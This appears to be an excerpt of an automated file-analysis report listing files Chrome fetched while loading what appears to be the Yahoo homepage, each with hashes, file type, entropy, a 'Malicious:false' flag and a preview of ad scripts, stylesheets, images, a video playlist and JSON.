                                                                                                                                                                                                                  SHA-256:96398EA031F2FABAC614F2A0719722AC6D4C531AFBC38D48C86DABD17D4D2D7F
                                                                                                                                                                                                                  SHA-512:84C8EA4CF4AEC794FAB79D1251396671D336CB275AF068C773B5F7A0BF40A867F58E1713DA8155E3CE5EB661F9FA65F6D7B1A2C47D4441798292BA2D1D4CA526
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(){"use strict";var e=window.wafer,t=e.base||{};function n(n,o){if(e)return o=o||{},e.utils.elementInView(n,o,t.viewport)}function o(e,t,n,o,i){return{clean:t,dest:n,h:i,metaSize:!0,pos:e,supports:!1,w:o}}var i={context:{bucket:"",bucketId:"",device:"",intl:"",lang:"",meta:{},mode:"normal",region:"",rid:"",site:""},i13n:{}},a=["MAST","LDRB"],s=function(){var e,t,s,r,l,c=window,d=document,f=c.adsConfig,u=c.YAHOO,v=void 0===u?i:u,p=c.DARLA,m=void 0===p?null:p,h=c.wafer,g={},b="adRotateEvt",w="scroll",E="homepage-viewer",C="sda-",L=C+"LREC4",A=C+"MON2",y="native-leaderboard-ad",x="gemini-ad-refresh",R=!1;function O(){var o;if(f&&(t=f.rotation)&&(null===(o=null==f?void 0:f.positions)||void 0===o?void 0:o[t.currentpos]))if(f.clientPositionMeta.positions.forEach((function(e){g[e.id]=e})),r=g[t.currentpos],m)if(t.enableNavAdRotation&&h.on("fetch:success",(function(e){e.elem.classList.contains("nextgen-page-navigation")&&function(e){var t=c._darlaAutoEvt;t||(t=m.evtSettings("AUTO")||{
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text, with very long lines (958)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12613
                                                                                                                                                                                                                  Entropy (8bit):6.035894551670195
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DFE1A1C7DE06FD742071B9D82E1302A3
                                                                                                                                                                                                                  SHA1:46927CE67C5ACF3262F99DFCF8A5FB3587BD7176
                                                                                                                                                                                                                  SHA-256:F395836BB5C49E040BB46B74A870E1F04B1A39ECD943E66A0F79BB5796DDABAF
                                                                                                                                                                                                                  SHA-512:519EC8A6021FCD44E3EEA0236A4AC72F923EDB5EE8E99FD228B09659E2D5744E1CD1B6346399487349BDAAC0666FC5889021B5C178192563B68236853124540A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-VERSION:4.#EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio-0",NAME="en (Main)",DEFAULT=YES,AUTOSELECT=YES,LANGUAGE="en",URI="https://manifest.prod.boltdns.net/manifest/v1/hls/v4/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/ad3e18d4-1bff-4b65-b5a9-f69cd5724579/6s/rendition.m3u8?fastly_token=NjcwMDU2N2RfY2I2NGYwMDI1NzVhY2MzODFjNTkzNDhmMTlmNzQ5MjkzMjk4MTA5YWNmMGVlZTQ2NDMxMDRmN2JkNWM4MDNkYw%3D%3D&bcov_auth=eyJhbGciOiJSUzI1NiJ9.eyJhY2NpZCI6IjY0MTU2NjU4MTUwMDEiLCJhdWQiOlsicGxheWJhY2suYXBpLmJyaWdodGNvdmUuY29tIl0sInBraWQiOiI5MjE4NDMyMC04ZmYzLTQ1ZTktYjYwMC05OTBmODIyYzg2NjciLCJleHAiOjE3MjgwNTMwOTQsImlhdCI6MTcyODA1Mjc5NH0.P_N1csFdXh8Ns9i7OSTfiDOpM-6jeDJ5F71Ovd-LRHSg0XTQm_KG2axeK-PrgfXOLuaVU1pxCvDw9HlTSmJA688eG4BF29834YK6ZyInrp3AmJ9kl9zA6FWjBU2B50gl8Xvtb6baYQqZO1khmo9xIvIsjozGtaL2GHvTwgC1NJdZHib-INaSwQhZ49zxaE19I0Qv7yuVNbdI4kLakOq1p_n26A7WAev-CoKiKyObUiGqMv-VPeSiODvHHhv3HVCNUwEucbONPRHIEMSPnDz82E5SXoLdP_pVkPx_Enmnhp2k1uAG536A2fZdcSA6iFIbr5CGrlcOwPJwR5aVUyBFXQ".#EXT-X-STREAM-INF:
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4629), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4629
                                                                                                                                                                                                                  Entropy (8bit):5.657689275670177
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:08D8A7B9E1ABF1B9A939F820CFAAE579
                                                                                                                                                                                                                  SHA1:4D1F222FAA2E11BC992E726D4F3C44981F03DF23
                                                                                                                                                                                                                  SHA-256:1E086778A25664C80DC74AA1D650403A1A044333EAA79138ECDB5C7B5D8CEB3C
                                                                                                                                                                                                                  SHA-512:7138EE2AF5B8CAB706CF1A9CD2035A4349C838DC1D4C47DB66D6DA22687FC90CAA56751C3BF3C5CCD91FE90FEEAD91E387E3977E64340048C42A189E3A4F66F0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/rx/ev/builds/1.9.1/evplayer.css
                                                                                                                                                                                                                  Preview:.evp-main,.evp-player{position:relative;width:100%;height:100%;outline:none}.evp-main .evp-docked-meta{position:relative;opacity:0;visibility:hidden;display:none;height:68px;font-size:16px;color:#121717;background:#fff;line-height:20px;padding-top:16px;left:0;right:0;box-shadow:0 2px 8px 0 rgba(0,0,0,0.5)}.evp-main .evp-docked-meta .evp-docked-title{position:relative;margin:0 16px 5px 16px;max-height:40px;overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}.evp-main .evp-docked-close-button{position:absolute;top:10px;right:8px;display:none;background-image:url("data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48dGl0bGU+YnV0dG9uLWNsb3NlPC90aXRsZT48ZGVmcz48ZmlsdGVyIHg9Ii01MCUiIHk9Ii01MCUiIHdpZHRoPSIyMDAlIiBoZWlnaHQ9IjIwMCUiIGZpbHRlclVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgaWQ9ImEiPjxmZU9mZnNldCBkeD0iMSIgZHk9IjEiIGluPSJTb3VyY2VBbHBoYSIgcmVzdWx0PSJzaGFkb3
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1610), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1610
                                                                                                                                                                                                                  Entropy (8bit):5.317017318435937
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DA05F5D596C887A6A5221011FA70D158
                                                                                                                                                                                                                  SHA1:76923BCDC453F807CF78D55E338B78ED8194D0CA
                                                                                                                                                                                                                  SHA-256:1D8F5B2BBB996A8F30C64630E9D1EA256B4FCA3F5C937F0856DEF478848DB025
                                                                                                                                                                                                                  SHA-512:509024EAEBF85380CB6BD1D4A32728DD69A9B8865657259535754BBD89CBEBAA4608BDBD49631F880051F8A712CB416AFFD35D067D9ADD5B09D18CBF9FAE7036
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/pv/static/ms/trendingNow-flameIcon.yhome-variable.a2368adb8251677d29ac1399a6f34c43.min.css
                                                                                                                                                                                                                  Preview::root,html[data-color-scheme=dark] [data-maintain-color],html[data-color-theme-enabled][data-color-scheme=light]{--srch-tn-flame-color:linear-gradient(-63.94deg, #1D2228 0%, #1D2228 16.1%, #B23909 16.1%, #B23909 32.2%, #FF520D 32.2%, #FF520D 48.2%, #1D2228 48.2%, #1D2228 67.8%, #B23909 67.8%, #B23909 83.9%, #FF520D 83.9%);--srch-tn-flame-icon:url('https://s.yimg.com/pv/static/img/icon-flame-light-202303010352.gif')}html[data-color-theme-enabled][data-color-scheme=dark]{--srch-tn-flame-color:linear-gradient(-63.94deg, #FFFFFF 0%, #FFFFFF 16.1%, #A34810 16.1%, #A34810 32.2%, #FD6100 32.2%, #FD6100 48.2%, #FFFFFF 48.2%, #FFFFFF 67.8%, #A34810 67.8%, #A34810 83.9%, #FD6100 83.9%);--srch-tn-flame-icon:url('https://s.yimg.com/pv/static/img/icon-flame-dark-202303010353.gif')}@media (prefers-color-scheme:dark){html[data-color-theme-enabled]{--srch-tn-flame-color:linear-gradient(-63.94deg, #FFFFFF 0%, #FFFFFF 16.1%, #A34810 16.1%, #A34810 32.2%, #FD6100 32.2%, #FD6100 48.2%, #FFFFFF 48.2%, #FFF
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 598 x 399, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):161479
                                                                                                                                                                                                                  Entropy (8bit):7.982853108866724
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:BC462296ACCDDECAE6C9CDDF12E1848A
                                                                                                                                                                                                                  SHA1:54DD74BFC4EC43D5393A3E0796E2ECA6FBFFD102
                                                                                                                                                                                                                  SHA-256:339616D7C2354827A92E984B9A8F0AA7ED20920574F7D072E9F45A187470DD81
                                                                                                                                                                                                                  SHA-512:1FA5325D13BD160DE4BE49D4A98DE85B3338D5895BBFCF27F4FA767B7EC4717019C96349CB6B0F5208CB4858CEFEB2D2D9A32CD39690805968DEC11A613919A1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:.PNG........IHDR...V............2....sBIT.....O... .IDATx..y.%.U..;.d.}..z.^.K..]]..hi...- ..........a...1..c.3|..`.....F2F..`KB.hA..V/R.....U.}{Uo..ffD..#..7...z....Wy3#N..8qN..'...I...(....x.....&%......8.N.c.e4...;u#...O#6..7..]`...=y2.....:=3#..Z.~Ca.v`...._B.j.:..!...z-....6.8.. (....X+.B.h...!i%..R$.....1..9...s..>}&]]..bnN.........&j.. .Wf..w...z.....j.I.....5....).....&..rrW.\E...<{.X. 1{..@.........:..&.P#.J..`..$%L:F.LX...r...G..t...`...:. $.$...C...-..B..$%......s].&..K-r*=L..\.!...b.....9vRPM..X..N_.....*...'+..a\......E*.^2.t...G...pM...E.(I.a4_.v...W....,..R0).(1.YbR..v...1.Wb9.AJ.....P....b...+.k..8....ck.90 ..$.(.k.@D!5.by.]8.Z.(.a$.....N.Ra..T..^`t..._CQD.R....,[.Yf...6z10...@..x-..N....V7|c..7^.al.P....n.:.R..l..mL.^...U...X+....D.].`..r'#... ..3@`hEZ.v.jp.`.F.?LH..sAo.t...s...Aa@Z. .0".H.R...2..5.....8v...j....C..5.E~!....Z....5t..x8yW............m$...J....h(L.-q.....PE..i....../s..US...B...Rz_}....N`.`.|....._.U.UH#.+M.}j..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):85
                                                                                                                                                                                                                  Entropy (8bit):4.292908596521779
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5BEC6606B8392065F9DA9898CA6F7B14
                                                                                                                                                                                                                  SHA1:73AC5B01B5E3293FB792179626E7F8369CDB944D
                                                                                                                                                                                                                  SHA-256:ACCCC501AA6AFA3CFAC15E8DDCCF1561DEED2ED08C2F7D652ABBDBE9AA71609A
                                                                                                                                                                                                                  SHA-512:36FEC10F71295203E59BCC52042EE2691E5DB51D26F6D76D4B19BFEDF4429FDE898C87ABC77CA29F6BB58E6217FF380F0650115C06395CB1DA270BD028C2CF80
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://sync-tm.everesttech.net/upi/pid/b9pj45k4?redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=${TM_USER_ID}&gdpr=1&gdpr_consent=
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............%.V.....PLTE......U..~....IDATx.c`.......'......IEND.B`.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (32022)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):106689
                                                                                                                                                                                                                  Entropy (8bit):5.590890005095041
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:141D73BCCD9D3E5C35FF696EC6CEC133
                                                                                                                                                                                                                  SHA1:6142398865BC0319E6D0ADC20B335148AA1BED61
                                                                                                                                                                                                                  SHA-256:A6C603942E8B3290D8444276924DB85709E447522E6F46B2D646179874D73D53
                                                                                                                                                                                                                  SHA-512:D76B6F3A5E57AE80F039152964345E6A384B7A7F485FEB250EB3604C49959E332C899FC6C708EF83F7F4EF8C67C2026E2B7E71216F78842925FA4AA2B52CD672
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://securepubads.g.doubleclick.net/tag/js/gpt.js
                                                                                                                                                                                                                  Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):6905
                                                                                                                                                                                                                  Entropy (8bit):5.911344863773853
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:7C4D5E218E0B8EA7124D4B1D9D7BC0DB
                                                                                                                                                                                                                  SHA1:9E8C9C6F78495326490961F9FF59448CA2702C66
                                                                                                                                                                                                                  SHA-256:7282F4B669A93B92B137B0DA435D42C2ABA60B00E73477ABEFEDB96005550369
                                                                                                                                                                                                                  SHA-512:76CBF5F952B83F778CCB8137CC25B4192AD4F9D390E2E3AF5154425578E1D06B0BA95F58F39EA68B41E566F3149EB9F1985E2E1105E47451631A2332B1D2B13F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://video-api.yql.yahoo.com/v1/video/sapi/streams/f0262557-5186-3d6e-913d-df2cba992b2f?srid=2064664218&protocol=http&format=m3u8%2Cmp4%2Cwebm&rt=html&devtype=desktop&offnetwork=false&plid=35b53262-b96b-4c4a-84ba-5d2a1c4febe4&region=US&site=frontpage&expb=TNBE003%2CUSNELT-ReactInRMP-commerce-ctrl-1004%2Cseamless&expn=advstrmvideo&bckt=Treatment_Oath_Player&lang=en-US&width=401&height=226&resize=true&ps=c3i31g7s&autoplay=false&image_sizes=&excludePS=true&isDockable=0&acctid=&synd=&pspid=2023538075&plidl=&topic=&pver=1.9.1&try=1&failover_count=0&ads=ima&ad.pl=up&ad.pd=&ad.pt=home&ad.pct=&evp=bcp&hlspre=false&ad.plseq=1&pblob=lu%3A0%3Bpt%3Ahome%3Bver%3Amegastrm&gdpr=false&iabconsent=&usprv=1YNN&gpp=DBAA&gppSid=-1
                                                                                                                                                                                                                  Preview:{"query":{"results":{"mediaObj":[{"id":"f0262557-5186-3d6e-913d-df2cba992b2f","meta":{"attribution":"","description":"18-year-old Sam Dutcher says his SUV malfunctioned while driving in rural Minnesota and caused him to lose control of the car at speeds reaching 113 mph. Dutcher is safe thanks to quick-thinking state patrol officers.","title":"Officer tells driver in out-of-control car to crash into him","genre":"","embed_rights":false,"duration":75,"url":"https://www.yahoo.com/news/officer-tells-driver-control-car-113111408.html","thumbnail":"https://s.yimg.com/uu/api/res/1.2/EEhMEMajzouGr62KXxLQRA--~B/Zmk9c3RyaW07aD0yMjY7dz00MDE7c209MTthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/cnn_videos_177/2b33a43611ff23744b84f32e94939209","create_date":"2024-10-03T12:09:37Z","provider":{"provider_id":"cnn_videos_177","provider_video_id":"https://www.cnn.com/2024/10/03/us/video/teen-driver-suv-police-crash-digvid","name":"CNN","url":"https://www.cnn.com/","logourl":"","publisher_id":"e695711
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):125558
                                                                                                                                                                                                                  Entropy (8bit):5.812052246489168
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B597131025967F818B5EE4C3DF1D62B0
                                                                                                                                                                                                                  SHA1:FC42586F310FD34ED9656EFEFD17DA706D53B71F
                                                                                                                                                                                                                  SHA-256:8225597C4F2F88B7B8DF5C9279022327FAE486714408EF32171D57F0A4B97EAE
                                                                                                                                                                                                                  SHA-512:ABD6674E15A161447263597FFA0E4788E1FAB7F1D14CFD63857A7BE71A55A6A65050F52AAA5A52C363FF27FBC0B11DDE616645E75A269FE571E03C0321F303DB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"/22888152279/us/yhp/main/dt/us_yhp_main_dt_top_right":["html",1,null,null,1,600,300,0,0,null,null,1,1,[["ID=de5275bca467c5fa:T=1728052786:RT=1728052786:S=ALNI_MbXFTVRFpO41Nx0x3Le8s8JjzvaMQ",1761748786,"/","yahoo.com",1],["UID=00000f23e5cf5c4b:T=1728052786:RT=1728052786:S=ALNI_MYDqnxs0hPrqgMBHbVs-VQIsRzjyw",1761748786,"/","yahoo.com",2]],[138472893846],[6692884752],[5335252228],[3455142215],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGslXC-8c4rjkaisJulWcH5owDF_Zde1EHcb6kifPdO4XQT3kdvmIwdmO5jF953C-qav24_p-Jvu2K7VLx_rK4hIhF0JZPNoijqyBI6glXBBPkLYK","CLzikaT69IgDFWAEVQgdI-gexQ",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,"AA-V4qOY9L0xFKZe-z_40bdueE3yRz6OBMITxxXMSzgB3z4ZAAQR6OWtjzqTZiBHiwxZjmC3_qbgRVA",null,null,1,null,null,null,[["ID=2be8119c7cd4c4ae:T=1728052786:RT=1728052786:S=AA-AfjaWlMXCkmc9cfQySJBtF443",1743604786,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><b
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4348), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4348
                                                                                                                                                                                                                  Entropy (8bit):5.175097086994074
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:681D57E9E7CBEF5DE44544C13F8CA62E
                                                                                                                                                                                                                  SHA1:65CFB6398D61FE7CAC86C90DC042095D8E3CD623
                                                                                                                                                                                                                  SHA-256:EF70829B2E58AFC016C35CE9A83E2BB60AD24D6341491686EE168EE71C40123F
                                                                                                                                                                                                                  SHA-512:2A131198DBB855882D7C7B687650B57133C4375FCEA4E4A86D338A78DCAEAFC18DC5477593429B6B1A599419F108F4BEBE7588BAE7C7831B5EA87D6C2BDF65C6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-countdown"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):664
                                                                                                                                                                                                                  Entropy (8bit):4.654474309626
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:8B140F0F0F6E1A0F986CC7D6DFD74D65
                                                                                                                                                                                                                  SHA1:E75B9E716E6DF29768EACFA27332F62144BDDA0C
                                                                                                                                                                                                                  SHA-256:AE57797F708333552A13BCD7293180163E6F38FD11B1A8CD5AA8F05421E5B8FA
                                                                                                                                                                                                                  SHA-512:BF71C5810BE6018D6C5564D4A11965F3543C458CA0AC755C4531796A14AC0A322CB838C4064C344643B0C53CD5074BE7FE6DA48AE6EBDD33B8ED610FEC46D4DF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cdn.taboola.com/libtrc/static/topics/taboola-browsing-topics.html
                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Taboola Topics Frame</title>. <script>. (async()=>{. var s=document.referrer;. if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics")). try{. var e=await document.browsingTopics();e.length&&parent.postMessage({topics:e},s). }catch(e){. parent.postMessage({error:e.message},s). }else parent.postMessage({policyMessage:"Topics not allowed in document feature policy in: "+s},s)})();. </script>.</head>.<body>.<div></div>.</body>.</html>.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2474)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):41150
                                                                                                                                                                                                                  Entropy (8bit):5.32836800322513
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:03DD89B74FB02695DAFAD8B06F080B69
                                                                                                                                                                                                                  SHA1:9405160A8CEAC347E575DBD0C508321AB5AB37CB
                                                                                                                                                                                                                  SHA-256:5B9CFA0283D9A9F6A909DF2B61C9933C11130343F08AEC96CDD8F49C29972526
                                                                                                                                                                                                                  SHA-512:F865528394AD972A618ECBD6CDC3555B81F65DDE612EEEFE27EE18761CA1A11B2CA3A52FF090CE0D9B200FB73734AD2CD3D8996CB0D284D2D2C017282461A108
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://pagead2.googlesyndication.com/omsdk/releases/live/omweb-v1.js
                                                                                                                                                                                                                  Preview:;(function(omidGlobal) {. var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function p(a){var b='undefined'!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if('number'==typeof a.length)return{next:aa(a)};throw Error(String(a)+' is not an iterable or ArrayLike');}function r(a){if(!(a instanceof Array)){a=p(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}.var ba='function'==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},t='function'==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=['object'==typeof globalThis&&globalThis,a,'object'==typeof window&&window,'object'==typeof self&&self,'object'==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error('Cannot find global object');}var da=ca(this);func
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):86997
                                                                                                                                                                                                                  Entropy (8bit):5.375766580804228
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:501B917544CE123EBC2EA9B25D2AF6AA
                                                                                                                                                                                                                  SHA1:C469B7A96FCD0ABAEEE14922642C6280323DA325
                                                                                                                                                                                                                  SHA-256:DDE420493E403EE34624D2FCF8D4B32F1EA40F3B2F9A803EA4000935C7678007
                                                                                                                                                                                                                  SHA-512:0A35F66E3752315AA0454AA084E52D3814F1ADCDA463D5C7045F1F40CFF497683E11E58310AFBB25D1242A95B1F89899AD5DB2529A70E18346782F4B7EE679E7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({reason:e,status:"rejected"})))))));const t=["localhost","aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),n=["cricket.yahoo.net"].map((e=>e.replace(/\./g,"\\."))),i=new RegExp(`^https?://(${t.concat(n).join("|")})(:\\d+)?$`);const s="initialize",o="initialize_ack",r="initialize_i13n",a="intersect",c="render",d="resize_ad",l="start_ads",h="tab_focus",u="block",g="index",p=!0,f="DOMContentLoaded",m="0",b="testid",y="ncid",_="fr",E="pg_name",v="type",I="benji-premium-ad",S="auto",A="VERSION",C={ATS_DIRECT:"_lr_atsDirect"};var T,w;!function(e){e.DynamicAllocation="Dynamic Allocation",e.DirectSold="Direct So
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 240 x 34, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2331
                                                                                                                                                                                                                  Entropy (8bit):7.732123200569469
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D0E45188F6A8F2E8F2528E762FE55D33
                                                                                                                                                                                                                  SHA1:42A007181ABDADCC4C79D03D74B08F39DDDC5127
                                                                                                                                                                                                                  SHA-256:DEB2DC4C95EA5B692229713672E7AEAE32B3914BAFCD63F926116D6637BD1976
                                                                                                                                                                                                                  SHA-512:0FD2F174A63472217D8BC23DE69DCBCAA1A583DED45152430D1A5BA455F6B1F360815DB34B5C8F96DA7DAAE232DB52197775F7F50955F497D6B664EB93B58800
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/cv/apiv2/yahoo_weather_web/accuweather-horizontal.png
